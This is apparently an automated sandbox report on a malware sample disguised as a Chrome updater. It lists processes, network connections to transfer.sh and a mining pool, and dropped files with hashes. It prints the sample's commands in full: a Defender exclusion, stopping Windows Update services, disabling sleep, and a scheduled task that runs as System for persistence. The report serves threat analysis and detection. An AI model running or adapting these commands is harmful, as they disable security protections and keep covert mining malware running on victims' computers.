C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Windows\system32\taskeng.exe

taskeng.exe {65B68D71-3ABA-4F35-8E6B-02DEE13D6A04} S-1-5-18:NT AUTHORITY\System:Service:

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --use-angle=swiftshader-webgl --use-gl=angle --headless --mojo-platform-channel-handle=2752 --field-trial-handle=1004,i,10899111363063097909,7730755134087179627,131072 --disable-features=PaintHolding /prefetch:8

C:\Program Files\Google\Chrome\updater.exe

"C:\Program Files\Google\Chrome\updater.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#syxapd#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\system32\schtasks.exe

"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\explorer.exe

C:\Windows\explorer.exe

Network

Country Destination Domain Proto
NL 136.244.98.226:33587 tcp
US 8.8.8.8:53 transfer.sh udp
DE 144.76.136.153:443 transfer.sh tcp
US 8.8.8.8:53 apps.identrust.com udp
NL 88.221.25.169:80 apps.identrust.com tcp
US 8.8.8.8:53 www.microsoft.com udp
NL 104.85.1.163:80 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
US 8.8.8.8:53 ogs.google.com udp
US 8.8.8.8:53 apis.google.com udp
DE 172.217.23.206:443 apis.google.com tcp
DE 172.217.23.206:443 apis.google.com tcp
NL 142.250.179.206:443 ogs.google.com tcp
US 8.8.8.8:53 youtube.com udp
NL 216.58.214.14:443 youtube.com tcp
US 8.8.8.8:53 play.google.com udp
NL 142.251.36.14:443 play.google.com tcp
US 8.8.8.8:53 i.ytimg.com udp
NL 142.251.36.54:443 i.ytimg.com tcp
US 8.8.8.8:53 accounts.google.com udp
NL 142.250.179.141:443 accounts.google.com tcp
NL 142.250.179.141:443 accounts.google.com udp
NL 142.251.36.14:443 play.google.com udp
NL 142.251.36.14:443 play.google.com udp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
US 8.8.8.8:53 googleads.g.doubleclick.net udp
NL 142.250.179.162:443 googleads.g.doubleclick.net tcp
NL 142.250.179.162:443 googleads.g.doubleclick.net udp
NL 142.251.36.54:443 i.ytimg.com udp
US 8.8.8.8:53 yt3.ggpht.com udp
NL 142.251.36.1:443 yt3.ggpht.com tcp
NL 142.251.36.1:443 yt3.ggpht.com tcp
NL 142.251.36.1:443 yt3.ggpht.com tcp
NL 142.251.36.1:443 yt3.ggpht.com tcp
US 8.8.8.8:53 accounts.google.com udp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 142.250.179.141:443 accounts.google.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
US 8.8.8.8:53 stratum-eu.rplant.xyz udp
FR 141.94.192.217:17056 stratum-eu.rplant.xyz tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp

Files

memory/3008-54-0x0000000000AD0000-0x0000000000B04000-memory.dmp

memory/3008-55-0x00000000747E0000-0x0000000074ECE000-memory.dmp

memory/3008-56-0x00000000002F0000-0x00000000002F6000-memory.dmp

memory/3008-57-0x00000000048F0000-0x0000000004930000-memory.dmp

memory/3008-58-0x00000000747E0000-0x0000000074ECE000-memory.dmp

memory/3008-59-0x00000000048F0000-0x0000000004930000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\CabA96B.tmp

MD5 3ac860860707baaf32469fa7cc7c0192
SHA1 c33c2acdaba0e6fa41fd2f00f186804722477639
SHA256 d015145d551ecd14916270efad773bbc9fd57fad2228d2c24559f696c961d904
SHA512 d62ad2408c969a95550fb87efda50f988770ba5e39972041bf85924275baf156b8bec309ecc6409e5acdd37ec175dea40eff921ab58933b5b5b5d35a6147567c

C:\Users\Admin\AppData\Local\Temp\TarAA29.tmp

MD5 4ff65ad929cd9a367680e0e5b1c08166
SHA1 c0af0d4396bd1f15c45f39d3b849ba444233b3a2
SHA256 c8733c93cc5aaf5ca206d06af22ee8dbdec764fb5085019a6a9181feb9dfdee6
SHA512 f530dc0d024a5a3b8903ffaaa41b608a5ccdd6da4ba1949f2c2e55a9fca475fec5c8d2119b5763cabe7ef1c3788fb9dcac621869db51d65b1d83cfe404fb4c27

\Users\Admin\AppData\Local\Temp\mi.exe

MD5 80b0b41decb53a01e8c87def18400267
SHA1 885f327c4e91065486137ca96105190f7a29d0f9
SHA256 10d8e7a04d05a2690a7e0cc30c10028eda0af680a8787f24cb9668ccbe46e1e1
SHA512 19bd6c9ab0cfbba34e722f508fcb4a99ae78a0d71ef664b186034c78eda09a61ae63455f7958dd5a50ec6432c822b23582ca7c87309a37fcbbb28e5facf56c8e

C:\Users\Admin\AppData\Local\Temp\mi.exe

MD5 80b0b41decb53a01e8c87def18400267
SHA1 885f327c4e91065486137ca96105190f7a29d0f9
SHA256 10d8e7a04d05a2690a7e0cc30c10028eda0af680a8787f24cb9668ccbe46e1e1
SHA512 19bd6c9ab0cfbba34e722f508fcb4a99ae78a0d71ef664b186034c78eda09a61ae63455f7958dd5a50ec6432c822b23582ca7c87309a37fcbbb28e5facf56c8e

C:\Users\Admin\AppData\Local\Temp\mi.exe

MD5 80b0b41decb53a01e8c87def18400267
SHA1 885f327c4e91065486137ca96105190f7a29d0f9
SHA256 10d8e7a04d05a2690a7e0cc30c10028eda0af680a8787f24cb9668ccbe46e1e1
SHA512 19bd6c9ab0cfbba34e722f508fcb4a99ae78a0d71ef664b186034c78eda09a61ae63455f7958dd5a50ec6432c822b23582ca7c87309a37fcbbb28e5facf56c8e

\Users\Admin\AppData\Local\Temp\cli.exe

MD5 b78141a544759e1a07740aa28b35584c
SHA1 af95ccd7d12c7ed7bdc6782373302118d2ebe3a8
SHA256 e268b72e92c9d9af52c25f4d7643bd96c84172fadb4e7a300091eb287ee3a35d
SHA512 2f83ef2eaf8951d392f32405dd9c2555be803f63cbdb9118c4204ad148a254a19aa593082a2f5c7a1b962329df08fede026d0715513adf26d838f043fd451959

memory/3008-155-0x000000000C350000-0x000000000C5DB000-memory.dmp

C:\Windows\Temp\setup.exe

MD5 84741bc02d2e9226a943aa03b6a4568d
SHA1 617d01316011faf77fba30d49ae1e86ff988380a
SHA256 fa1f99fdd5beab9a996ff3cb58886dc1811fd6e1ba444aee2d80d0d9b9d5ec93
SHA512 1c95842c88f7d17a07fa2480281cbdff27136525c80a00387536a0843e040adcac37fd13166ab7f48398d28fd297c92d5c0d0ef4066e68297ea9f30179754379

\Windows\Temp\setup.exe

MD5 84741bc02d2e9226a943aa03b6a4568d
SHA1 617d01316011faf77fba30d49ae1e86ff988380a
SHA256 fa1f99fdd5beab9a996ff3cb58886dc1811fd6e1ba444aee2d80d0d9b9d5ec93
SHA512 1c95842c88f7d17a07fa2480281cbdff27136525c80a00387536a0843e040adcac37fd13166ab7f48398d28fd297c92d5c0d0ef4066e68297ea9f30179754379

C:\Windows\Temp\setup.exe

MD5 84741bc02d2e9226a943aa03b6a4568d
SHA1 617d01316011faf77fba30d49ae1e86ff988380a
SHA256 fa1f99fdd5beab9a996ff3cb58886dc1811fd6e1ba444aee2d80d0d9b9d5ec93
SHA512 1c95842c88f7d17a07fa2480281cbdff27136525c80a00387536a0843e040adcac37fd13166ab7f48398d28fd297c92d5c0d0ef4066e68297ea9f30179754379

C:\Users\Admin\AppData\Local\Temp\cli.exe

MD5 b78141a544759e1a07740aa28b35584c
SHA1 af95ccd7d12c7ed7bdc6782373302118d2ebe3a8
SHA256 e268b72e92c9d9af52c25f4d7643bd96c84172fadb4e7a300091eb287ee3a35d
SHA512 2f83ef2eaf8951d392f32405dd9c2555be803f63cbdb9118c4204ad148a254a19aa593082a2f5c7a1b962329df08fede026d0715513adf26d838f043fd451959

memory/3064-164-0x0000000003850000-0x0000000004A76000-memory.dmp

memory/1076-165-0x0000000000AA0000-0x0000000000D2B000-memory.dmp

memory/1768-163-0x000000013F190000-0x00000001403B6000-memory.dmp

memory/1768-166-0x00000000775A0000-0x0000000077749000-memory.dmp

memory/1768-168-0x000000013F190000-0x00000001403B6000-memory.dmp

memory/1768-167-0x000000013F190000-0x00000001403B6000-memory.dmp

memory/1076-169-0x0000000000AA0000-0x0000000000D2B000-memory.dmp

memory/1768-170-0x000000013F190000-0x00000001403B6000-memory.dmp

memory/1768-171-0x000000013F190000-0x00000001403B6000-memory.dmp

memory/1768-172-0x000000013F190000-0x00000001403B6000-memory.dmp

memory/2116-175-0x0000000000400000-0x0000000000527000-memory.dmp

memory/2116-174-0x0000000000400000-0x0000000000527000-memory.dmp

memory/1768-173-0x000000013F190000-0x00000001403B6000-memory.dmp

memory/2116-181-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp

\Users\Admin\AppData\Local\Temp\cc.exe

MD5 858f82fe9166c34b6709a3adfe6a625f
SHA1 63275e4b77e0fe6fa6f1db716b5963b69b68f8a5
SHA256 8ec2c1bb10e05a5129269488b53a46c6b5be3691c61ef7da7c6eecf1c0444b28
SHA512 1338082ebb6bf658125cd6d72f5885c78865c1abbed50fd10317dacaf41a450eb98b949631f1a1b94a67d335b23cfc0fa78d0d8db3d726adf2a57af50307b89e

memory/1768-182-0x000000013F190000-0x00000001403B6000-memory.dmp

memory/2116-186-0x0000000000400000-0x0000000000527000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\cc.exe

MD5 858f82fe9166c34b6709a3adfe6a625f
SHA1 63275e4b77e0fe6fa6f1db716b5963b69b68f8a5
SHA256 8ec2c1bb10e05a5129269488b53a46c6b5be3691c61ef7da7c6eecf1c0444b28
SHA512 1338082ebb6bf658125cd6d72f5885c78865c1abbed50fd10317dacaf41a450eb98b949631f1a1b94a67d335b23cfc0fa78d0d8db3d726adf2a57af50307b89e

memory/3064-189-0x0000000003850000-0x0000000004A76000-memory.dmp

memory/3008-192-0x000000000C4F0000-0x000000000CB24000-memory.dmp

memory/2652-193-0x0000000000E10000-0x0000000001444000-memory.dmp

memory/2652-194-0x0000000077790000-0x0000000077792000-memory.dmp

memory/3008-197-0x00000000747E0000-0x0000000074ECE000-memory.dmp

memory/1076-196-0x0000000000AA0000-0x0000000000D2B000-memory.dmp

memory/2652-195-0x0000000000100000-0x0000000000170000-memory.dmp

memory/1768-198-0x00000000775A0000-0x0000000077749000-memory.dmp

memory/1768-199-0x000000013F190000-0x00000001403B6000-memory.dmp

memory/2652-201-0x00000000007A0000-0x000000000080C000-memory.dmp

memory/2652-200-0x0000000000E10000-0x0000000001444000-memory.dmp

memory/2652-202-0x00000000747E0000-0x0000000074ECE000-memory.dmp

memory/2652-203-0x0000000005F20000-0x0000000005F60000-memory.dmp

memory/2652-204-0x0000000005F20000-0x0000000005F60000-memory.dmp

memory/2652-206-0x00000000031F0000-0x00000000032A2000-memory.dmp

memory/2652-205-0x0000000005F20000-0x0000000005F60000-memory.dmp

memory/2116-207-0x0000000000400000-0x0000000000527000-memory.dmp

memory/2116-240-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/2116-244-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

\Users\Admin\AppData\Local\Temp\cli.exe

MD5 b78141a544759e1a07740aa28b35584c
SHA1 af95ccd7d12c7ed7bdc6782373302118d2ebe3a8
SHA256 e268b72e92c9d9af52c25f4d7643bd96c84172fadb4e7a300091eb287ee3a35d
SHA512 2f83ef2eaf8951d392f32405dd9c2555be803f63cbdb9118c4204ad148a254a19aa593082a2f5c7a1b962329df08fede026d0715513adf26d838f043fd451959

\Users\Admin\AppData\Local\Temp\cli.exe

MD5 b78141a544759e1a07740aa28b35584c
SHA1 af95ccd7d12c7ed7bdc6782373302118d2ebe3a8
SHA256 e268b72e92c9d9af52c25f4d7643bd96c84172fadb4e7a300091eb287ee3a35d
SHA512 2f83ef2eaf8951d392f32405dd9c2555be803f63cbdb9118c4204ad148a254a19aa593082a2f5c7a1b962329df08fede026d0715513adf26d838f043fd451959

memory/2116-248-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/2116-247-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/2116-246-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/2116-241-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/2116-245-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/2116-249-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/2116-251-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User DataSGDF5\CrashpadMetrics-active.pma

MD5 03c4f648043a88675a920425d824e1b3
SHA1 b98ce64ab5f7a187d19deb8f24ca4ab5d9720a6d
SHA256 f91dbb7c64b4582f529c968c480d2dce1c8727390482f31e4355a27bb3d9b450
SHA512 2473f21cf8747ec981db18fb42726c767bbcca8dd89fd05ffd2d844206a6e86da672967462ac714e6fb43cc84ac35fffcec7ddc43a9357c1f8ed9d14105e9192

memory/2116-252-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/2116-255-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/2116-256-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/2116-257-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/2116-258-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/2116-259-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/2116-260-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/2116-261-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/2116-262-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/2116-263-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/2116-264-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/2116-265-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/2116-266-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/2116-267-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/2116-268-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/2116-269-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/2116-270-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/2116-272-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/2652-271-0x0000000000E10000-0x0000000001444000-memory.dmp

memory/2116-275-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/2116-274-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/2116-276-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User DataSGDF5\Local State

MD5 cdcff98fd3389eeed4d8e38cecc391f7
SHA1 3338512db4333d833322edfba43103a85519f5d3
SHA256 b157044d0c623896d58cb2b2796446ae476c165043483534228e765003938723
SHA512 c8f2236f3cdf3326a7e180b30218d48a91bda35c946db9a6c57cbcc40374f29772fad435dab29938435db16377935daf433c9b467317d9ac4b86cf75ccc8054f

memory/2116-278-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/2116-277-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/2116-281-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/2116-280-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/2116-279-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/2116-286-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/2116-285-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/2116-284-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/2116-283-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/2116-282-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/2116-287-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/2116-288-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

\??\pipe\crashpad_976_FUEOACUFXUEVFXNR

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

memory/2244-327-0x000007FEF3850000-0x000007FEF41ED000-memory.dmp

memory/2652-330-0x00000000747E0000-0x0000000074ECE000-memory.dmp

memory/2244-329-0x0000000002850000-0x00000000028D0000-memory.dmp

memory/2116-332-0x000000007779F000-0x00000000777A0000-memory.dmp

memory/2652-331-0x0000000005F20000-0x0000000005F60000-memory.dmp

memory/2244-328-0x0000000002850000-0x00000000028D0000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User DataSGDF5\Default\Local Storage\leveldb\MANIFEST-000004

MD5 031d6d1e28fe41a9bdcbd8a21da92df1
SHA1 38cee81cb035a60a23d6e045e5d72116f2a58683
SHA256 b51bc53f3c43a5b800a723623c4e56a836367d6e2787c57d71184df5d24151da
SHA512 e994cd3a8ee3e3cf6304c33df5b7d6cc8207e0c08d568925afa9d46d42f6f1a5bdd7261f0fd1fcdf4df1a173ef4e159ee1de8125e54efee488a1220ce85af904

C:\Users\Admin\AppData\Local\Google\Chrome\User DataSGDF5\Default\Local Storage\leveldb\CURRENT

MD5 6752a1d65b201c13b62ea44016eb221f
SHA1 58ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA256 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA512 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

C:\Users\Admin\AppData\Local\Google\Chrome\User DataSGDF5\Default\Local Storage\leveldb\LOG

MD5 bf841fbbb40236153a2c0e5d2b5d7317
SHA1 35dd87a49e37d4842beb3a0f7727a74cf6416af2
SHA256 c506fe35188318a04f3225fad7d88f9ad8737be5fe5287e9a04de8f74ab386ac
SHA512 263d50d10d4e4bde183edbd6636a846beac4175612ac70366d71906851d5b7490b3d8eb80182c0f09dcd05bf297833293ede1d715434aac863045b67448715f3

C:\Users\Admin\AppData\Local\Google\Chrome\User DataSGDF5\Default\Local Storage\leveldb\LOG.old

MD5 a3eab45d8850cd7d3a8811857cc51426
SHA1 73a03c3bb82b4279174c81586fffd64a14294198
SHA256 8307c143a2f2913f200be6410e6d12b997aeeaf18448235e7e3eb1db0e723e23
SHA512 410a61fa03584af80d0ae0455ee7ae047c7231598ca19a83a49b5df89eddbfb6ddda981a43602efddc46da4d1345cf6a0f029f34d859cfe5aa0be23886dbd62e

memory/2244-355-0x000000001B320000-0x000000001B602000-memory.dmp

memory/2244-358-0x0000000001D30000-0x0000000001D38000-memory.dmp

\Users\Admin\AppData\Local\Temp\cli.exe

MD5 b78141a544759e1a07740aa28b35584c
SHA1 af95ccd7d12c7ed7bdc6782373302118d2ebe3a8
SHA256 e268b72e92c9d9af52c25f4d7643bd96c84172fadb4e7a300091eb287ee3a35d
SHA512 2f83ef2eaf8951d392f32405dd9c2555be803f63cbdb9118c4204ad148a254a19aa593082a2f5c7a1b962329df08fede026d0715513adf26d838f043fd451959

memory/2652-361-0x0000000005F20000-0x0000000005F60000-memory.dmp

memory/2244-362-0x0000000002850000-0x00000000028D0000-memory.dmp

memory/2652-363-0x0000000005F20000-0x0000000005F60000-memory.dmp

memory/2652-364-0x0000000005F20000-0x0000000005F60000-memory.dmp

memory/2244-365-0x0000000002850000-0x00000000028D0000-memory.dmp

memory/2244-366-0x000007FEF3850000-0x000007FEF41ED000-memory.dmp

memory/2652-368-0x0000000002F50000-0x0000000002F92000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User DataSGDF5\Default\Network\Cookies

MD5 c9ff7748d8fcef4cf84a5501e996a641
SHA1 02867e5010f62f97ebb0cfb32cb3ede9449fe0c9
SHA256 4d3f3194cb1133437aa69bb880c8cbb55ddf06ff61a88ca6c3f1bbfbfd35d988
SHA512 d36054499869a8f56ac8547ccd5455f1252c24e17d2b185955390b32da7e2a732ace4e0f30f9493fcc61425a2e31ed623465f998f41af69423ee0e3ed1483a73

C:\Windows\system32\drivers\etc\hosts

MD5 2b19df2da3af86adf584efbddd0d31c0
SHA1 f1738910789e169213611c033d83bc9577373686
SHA256 58868a299c5cf1167ed3fbc570a449ecd696406410b24913ddbd0f06a32595bd
SHA512 4a1831f42a486a0ad2deef3d348e7220209214699504e29fdfeb2a6f7f25ad1d353158cd05778f76ef755e77ccd94ce9b4a7504039e439e4e90fa7cde589daa6

C:\Users\Admin\AppData\Local\Google\Chrome\User DataSGDF5\Default\Session Storage\CURRENT~RFf777002.TMP

MD5 46295cac801e5d4857d09837238a6394
SHA1 44e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA256 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA512 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\CZO2F84BF8VFR4POAXJ1.temp

MD5 54371f9cbf8489a348620e26e2ab035e
SHA1 ad568811bdf1b8eb659ca44a848d98cd156fc86f
SHA256 c518b7a76bdbf61d0c800f6b6746f729d927b4ff7d3b3b0589b05723cf706967
SHA512 46f676bd3708beb5ded1f18844eef724b6b22f037812c40c325375f9ca081e9638d1510da412229d9277bf05039e0956dee3c146b8c3d7725f684be564479273

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 54371f9cbf8489a348620e26e2ab035e
SHA1 ad568811bdf1b8eb659ca44a848d98cd156fc86f
SHA256 c518b7a76bdbf61d0c800f6b6746f729d927b4ff7d3b3b0589b05723cf706967
SHA512 46f676bd3708beb5ded1f18844eef724b6b22f037812c40c325375f9ca081e9638d1510da412229d9277bf05039e0956dee3c146b8c3d7725f684be564479273

memory/1708-398-0x000000001B270000-0x000000001B552000-memory.dmp

memory/1708-400-0x000007FEF37E0000-0x000007FEF417D000-memory.dmp

memory/1708-399-0x0000000001DB0000-0x0000000001DB8000-memory.dmp

memory/1708-403-0x00000000025B0000-0x0000000002630000-memory.dmp

memory/1708-404-0x000007FEF37E0000-0x000007FEF417D000-memory.dmp

memory/1708-407-0x00000000025B0000-0x0000000002630000-memory.dmp

memory/1708-406-0x00000000025B0000-0x0000000002630000-memory.dmp

memory/1708-418-0x00000000025B0000-0x0000000002630000-memory.dmp

memory/1708-467-0x000007FEF37E0000-0x000007FEF417D000-memory.dmp

C:\Windows\Temp\setup.exe

MD5 84741bc02d2e9226a943aa03b6a4568d
SHA1 617d01316011faf77fba30d49ae1e86ff988380a
SHA256 fa1f99fdd5beab9a996ff3cb58886dc1811fd6e1ba444aee2d80d0d9b9d5ec93
SHA512 1c95842c88f7d17a07fa2480281cbdff27136525c80a00387536a0843e040adcac37fd13166ab7f48398d28fd297c92d5c0d0ef4066e68297ea9f30179754379

memory/1768-479-0x00000000775A0000-0x0000000077749000-memory.dmp

memory/1768-480-0x000000013F190000-0x00000001403B6000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User DataSGDF5\Default\IndexedDB\https_www.youtube.com_0.indexeddb.leveldb\000002.dbtmp

MD5 206702161f94c5cd39fadd03f4014d98
SHA1 bd8bfc144fb5326d21bd1531523d9fb50e1b600a
SHA256 1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167
SHA512 0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

C:\Users\Admin\AppData\Local\Google\Chrome\User DataSGDF5\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

MD5 ffd6cf619f16b17d32cc385d68bf6d02
SHA1 15e9187d1777826be2e523ada42c9ac0af1efca6
SHA256 6d0858cf4e6f2d8ace06d1afa97db147e2812cca8415909a8b2915b6ca1d3502
